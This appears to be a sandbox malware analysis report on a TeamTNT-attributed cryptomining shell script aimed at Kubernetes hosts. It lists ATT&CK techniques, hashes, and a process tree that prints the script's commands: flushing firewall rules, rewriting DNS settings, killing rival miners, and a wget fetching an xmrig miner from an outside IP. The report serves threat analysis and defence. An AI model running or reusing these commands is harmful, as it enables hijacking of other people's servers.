317806eaebb1cec9ddb962ef7fa19ee0673a67db3a8c7d650d76885041031ce8

Analysis

max time kernel
134s
max time network
153s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240508-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
29-12-2024 23:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SugarLogic_#teamtnt_by_@r3dbU7z/Kubernetes_root_PayLoad_2.sh
Size

27KB
MD5

0da186f3e1f8c89c5fbe5672cbdf05b6
SHA1

a917ab4301ab25749d6e867a1812e61b3b09df3f
SHA256

f82ea98d1dc5d14817c80937b91b381e9cd29d82367a2dfbde60cfb073ea4316
SHA512

25c6afd296b855f8d230389479b95ac079b51a084b38ef7a9a2747024fae8d4441f45b2fb45071f59835868a3b31d7fab2549244be43a09942a5fc07240f7f1d
SSDEEP

384:ckWWRItydlaRM07lT2wDi/Y5vWCr7Q2K3v/lts1dIxRsnJEbOU89WV/:ckWcItYlaxlT2wDGWvWCrzPoRfOPO/

Score

7^/10

defense_evasion discovery persistence

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 1 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1718	chmod

Flushes firewall rules 1 TTPs 1 IoCs

Flushes/ disables firewall rules inside the Linux kernel.

defense_evasion

Disable or Modify System Firewall

T1562.004

pid	Process
1727	iptables

Modifies hosts file 1 IoCs

Adds to hosts file used for mapping hosts to IP addresses.

description	ioc	Process
File opened for modification	/etc/hosts	Kubernetes_root_PayLoad_2.sh

Writes DNS configuration 1 TTPs 1 IoCs

Writes data to DNS resolver config file.

Adversary-in-the-Middle

T1557

description	ioc	Process
File opened for modification	/etc/resolv.conf	Kubernetes_root_PayLoad_2.sh

Enumerates running processes
Discovers information about currently running processes on the system

Write file to user bin folder 6 IoCs

persistence

description	ioc	Process
File opened for modification	/usr/sbin/C_hg_curl	cp
File opened for modification	/usr/sbin/.configure/config.json	Kubernetes_root_PayLoad_2.sh
File opened for modification	/usr/sbin/.configure/sedBLUsZV	sed
File opened for modification	/usr/sbin/.configure/config_background.json	cp
File opened for modification	/usr/sbin/.configure/sedPoJNyV	sed
File opened for modification	/usr/sbin/.configure/xmrig.tar.gz	wget

Reads CPU attributes 1 TTPs 2 IoCs

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps

Process Discovery 1 TTPs 2 IoCs

Adversaries may try to discover information about running processes.

discovery

Process Discovery

T1057

pid	Process
1723	ps
1725	ps

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/472/stat	ps
File opened for reading	/proc/1262/status	ps
File opened for reading	/proc/5/cmdline	pidof
File opened for reading	/proc/1503/cmdline	pidof
File opened for reading	/proc/466/cmdline	pidof
File opened for reading	/proc/522/cmdline	pidof
File opened for reading	/proc/80/stat	ps
File opened for reading	/proc/1383/status	ps
File opened for reading	/proc/443/status	ps
File opened for reading	/proc/1199/status	ps
File opened for reading	/proc/84/cmdline	ps
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/4/cmdline	pidof
File opened for reading	/proc/11/cmdline	pidof
File opened for reading	/proc/4/status	ps
File opened for reading	/proc/13/cmdline	ps
File opened for reading	/proc/98/stat	ps
File opened for reading	/proc/459/cmdline	ps
File opened for reading	/proc/177/stat	ps
File opened for reading	/proc/2/stat	killall
File opened for reading	/proc/28/cmdline	pidof
File opened for reading	/proc/162/cmdline	ps
File opened for reading	/proc/1383/stat	ps
File opened for reading	/proc/160/status	ps
File opened for reading	/proc/1139/stat	ps
File opened for reading	/proc/158/stat	ps
File opened for reading	/proc/1189/stat	ps
File opened for reading	/proc/3/status	ps
File opened for reading	/proc/1507/stat	killall
File opened for reading	/proc/160/stat	ps
File opened for reading	/proc/464/stat	ps
File opened for reading	/proc/656/status	ps
File opened for reading	/proc/1509/stat	killall
File opened for reading	/proc/3/status	ps
File opened for reading	/proc/81/status	ps
File opened for reading	/proc/523/stat	ps
File opened for reading	/proc/952/stat	pidof
File opened for reading	/proc/85/status	ps
File opened for reading	/proc/175/status	ps
File opened for reading	/proc/6/cmdline	ps
File opened for reading	/proc/966/stat	ps
File opened for reading	/proc/1169/stat	killall
File opened for reading	/proc/656/stat	ps
File opened for reading	/proc/1177/status	ps
File opened for reading	/proc/1726/cmdline	ps
File opened for reading	/proc/966/stat	killall
File opened for reading	/proc/522/stat	killall
File opened for reading	/proc/1152/cmdline	pidof
File opened for reading	/proc/473/stat	killall
File opened for reading	/proc/1507/cmdline	pidof
File opened for reading	/proc/1115/cmdline	ps
File opened for reading	/proc/5/cmdline	ps
File opened for reading	/proc/170/stat	ps
File opened for reading	/proc/1152/stat	ps
File opened for reading	/proc/1062/status	ps
File opened for reading	/proc/12/stat	killall
File opened for reading	/proc/168/stat	ps
File opened for reading	/proc/1503/stat	ps
File opened for reading	/proc/35/status	ps
File opened for reading	/proc/160/cmdline	ps
File opened for reading	/proc/168/cmdline	pidof
File opened for reading	/proc/1086/stat	pidof
File opened for reading	/proc/tty/drivers	ps
File opened for reading	/proc/1/stat	killall

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/sh-thd.05eGNW	Kubernetes_root_PayLoad_2.sh

/tmp/SugarLogic_#teamtnt_by_@r3dbU7z/Kubernetes_root_PayLoad_2.sh
"/tmp/SugarLogic_#teamtnt_by_@r3dbU7z/Kubernetes_root_PayLoad_2.sh"
1⤵
- Modifies hosts file
- Writes DNS configuration
- Write file to user bin folder
- Writes file to tmp directory
PID:1509
- /bin/uname
  uname -m
  2⤵
  PID:1510
- /bin/uname
  uname -m
  2⤵
  PID:1511
- /bin/hostname
  hostname
  2⤵
  PID:1512
- /bin/pidof
  pidof /usr/sbin/.configure/xmrig
  2⤵
  - Reads runtime system information
  PID:1513
- /bin/grep
  grep "45.9.148.108 chimaera.cc" /etc/hosts
  2⤵
  PID:1642
- /bin/grep
  grep chimaera /etc/hosts
  2⤵
  PID:1643
- /bin/grep
  grep "45.9.148.108 teamtnt.red" /etc/hosts
  2⤵
  PID:1652
- /bin/grep
  grep teamtnt /etc/hosts
  2⤵
  PID:1653
- /bin/grep
  grep "nameserver 8.8.8.8\\|nameserver 8.8.4.4" /etc/resolv.conf
  2⤵
  PID:1662
- /bin/grep
  grep nameserver /etc/resolv.conf
  2⤵
  PID:1663
- /bin/sed
  sed -i /nameserver/d /etc/resolv.conf
  2⤵
  PID:1668
- /bin/grep
  grep "nameserver 8.8.8.8" /etc/resolv.conf
  2⤵
  PID:1673
- /bin/grep
  grep "nameserver 8.8.4.4" /etc/resolv.conf
  2⤵
  PID:1682
- /bin/cp
  cp /usr/bin/curl /usr/sbin/C_hg_curl
  2⤵
  - Write file to user bin folder
  PID:1717
- /bin/chmod
  chmod +x /usr/sbin/C_hg_curl
  2⤵
  - File and Directory Permissions Modification
  PID:1718
- /bin/grep
  grep -i "[a]liyun"
  2⤵
  PID:1724
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1723
- /bin/grep
  grep -i "[y]unjing"
  2⤵
  PID:1726
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1725
- /sbin/iptables
  iptables -F
  2⤵
  - Flushes firewall rules
  PID:1727
- /bin/mkdir
  mkdir -p /usr/sbin/.configure/
  2⤵
  PID:1730
- /bin/systemctl
  systemctl stop account_daemons.service
  2⤵
  PID:1731
- /bin/systemctl
  systemctl stop moneroocean_miner.service
  2⤵
  PID:1735
- /usr/bin/killall
  killall -9 xmrig
  2⤵
  - Reads runtime system information
  PID:1736
- /usr/bin/killall
  killall -9 xmrigMiner
  2⤵
  - Reads runtime system information
  PID:1740
- /bin/rm
  rm -rf /usr/sbin/moneroocean/
  2⤵
  PID:1741
- /bin/rm
  rm -rf /usr/bin/moneroocean/
  2⤵
  PID:1742
- /bin/rm
  rm -rf /usr/sbin/moneroocean/
  2⤵
  PID:1743
- /usr/bin/nproc
  nproc
  2⤵
  PID:1744
- /bin/sleep
  sleep 2
  2⤵
  PID:1745
- /bin/rm
  rm -f "/usr/sbin/.configure/*.json"
  2⤵
  PID:1746
- /bin/cat
  cat
  2⤵
  PID:1747
- /bin/sed
  sed -r "s/[^a-zA-Z0-9\\-]+/_/g"
  2⤵
  PID:1751
- /usr/bin/cut
  cut -f1 -d.
  2⤵
  PID:1750
- /bin/hostname
  hostname
  2⤵
  PID:1749
- /bin/sed
  sed -i "s/\"pass\": *\"[^\"]*\",/\"pass\": \"ubuntu1804-amd64-20240508-en-9\",/" /usr/sbin/.configure/config.json
  2⤵
  - Write file to user bin folder
  PID:1752
- /bin/cp
  cp /usr/sbin/.configure/config.json /usr/sbin/.configure/config_background.json
  2⤵
  - Write file to user bin folder
  - Reads runtime system information
  PID:1753
- /bin/sed
  sed -i "s/\"background\": *false,/\"background\": true,/" /usr/sbin/.configure/config_background.json
  2⤵
  - Write file to user bin folder
  PID:1754
- /usr/bin/wget
  wget -q http://85.214.149.236:443/sugarcrm/themes/default/images/SugarLogic/.../xmr/kuben3/x86_64.tar.gz -O /usr/sbin/.configure/xmrig.tar.gz
  2⤵
  - Write file to user bin folder
  PID:1755

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

Adversary-in-the-Middle

T1557

Discovery

Process Discovery

T1057

System Information Discovery

T1082

Lateral Movement

Collection

Adversary-in-the-Middle

T1557

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/etc/resolv.conf

Filesize
712B

MD5
a093dfdbbd74165a601e3d0a6edbd9ef

SHA1
7ab579e4e6a4e8c51964c5adbc2ed277532ce709

SHA256
f88b9aa5310a15a6514f1aeccc77bdc8ec091710252f55bb0f8a2afd9552aa0e

SHA512
2df92cb90c044a64ed4ada425723d2d507c157263c8858912e37fa68648b40f1b0e4370fbbffff49fb417aa46cb72ec7d122ec32f14cb86578a779efb8dd4b18

Download Submit
/etc/resolv.conf

Filesize
731B

MD5
90bcb4fd8b97b887d3745d43e8f12f24

SHA1
312bab4a98f87185073dbdc04c9822823c9039a3

SHA256
1fbcfe5cc4f603514a6d33cb0096056b992be165c17dbf8d28594a32bb93307d

SHA512
1c80583a9f32066060224a476f119779a15bbd82c8d7d3f3a05b2367087558ee375647cfe89132ac6838c69ae88e95050eb0d7ae4169d0c163efebda0a7e059d

Download Submit
/etc/sedJriCTz

Filesize
693B

MD5
ea893b90c1097c28090d547821653109

SHA1
7a7ab487a0d4d79c36d1cea391ad66b2fe2e9d7a

SHA256
064c810eccf1ab5849318b21270ff62f901afe34fe5e3bb5666e920db31aa367

SHA512
71168ece95e19faa51e804d73a32f881f2b5013225c94ca202313ddfbe1f224bbabc94168bcda759ab0e02e2d503e958b9fae1191f19e71d8879f348e76a21c5

Download Submit
/tmp/sh-thd.05eGNW

Filesize
4KB

MD5
ca530ff912cb1a57246c9b11a6db5dbe

SHA1
67fe585886fcbf5169cb1fa56f85864edc5e9f14

SHA256
0db9d6dbd1c03ad2ab7b41adaabd82919dc829a28f444e9ec68173e83d4c6aa7

SHA512
6c85b33f1dcb1abec7e7121f3ac45d6dd6dd75ed03f6bed956545d7e1feb9512766efee27d1015fa27d013fa73e0521d76f79b972b9d8b630ff26172609b1038

Download Submit
/usr/sbin/.configure/sedPoJNyV

Filesize
4KB

MD5
6f5f12b9aab59646024a835c4d3b2941

SHA1
97d382bdeb13751bbff42442ae51413e4462499e

SHA256
0292179b087ca3a9d7c5d05353692be8521dafd06f8d1e4826c10c00c56c4a2d

SHA512
eb4d87fe4674942e7ec57249a0c4009f545a307258de73cd628974b6995c7393a99615b0caca20f44af731a9c63e78ffcc029eb1b37b59d1a5359d40c3681850

Download Submit
/usr/sbin/C_hg_curl

Filesize
218KB

MD5
b194675c8ea858f2ed21214e9bbfc16b

SHA1
85c58852d6363a51fa3851843ef410da46b84465

SHA256
14ac73386c9ca706968f2ad2bd2a861f37659d669756e730fe2747d3b726f1da

SHA512
db71cc546667046ecf2c9cfb3faf2c332b0a845db1aa9956604abcbf190504f8c0d612469a91973a71e825d2241a576d30144ee8c3f6b1ecd73a5ebd9e92dff0

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads